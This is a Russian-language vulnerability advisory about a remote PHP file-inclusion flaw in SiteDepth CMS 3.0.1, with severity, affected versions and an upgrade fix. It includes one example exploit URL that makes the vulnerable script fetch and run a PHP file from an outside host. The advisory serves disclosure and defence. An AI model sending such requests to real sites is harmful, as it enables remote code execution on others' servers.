PHP-инклюдинг в SiteDepth CMS

Дата публикации:
24.07.2006
Дата изменения:
24.03.2009
Всего просмотров:
1953
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
SiteDepth CMS 3.x
Уязвимые версии: SiteDepth CMS 3.0.1, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "SD_DIR" в сценарии constants.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://victim/constants.php?SD_DIR=http://www.yourspace.com/yourscript.php?

URL производителя: sitedepth.com/products_sd3.php

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: SiteDepth CMS <= 3.0.1 - Remote File Include Vulnerability

или введите имя

CAPTCHA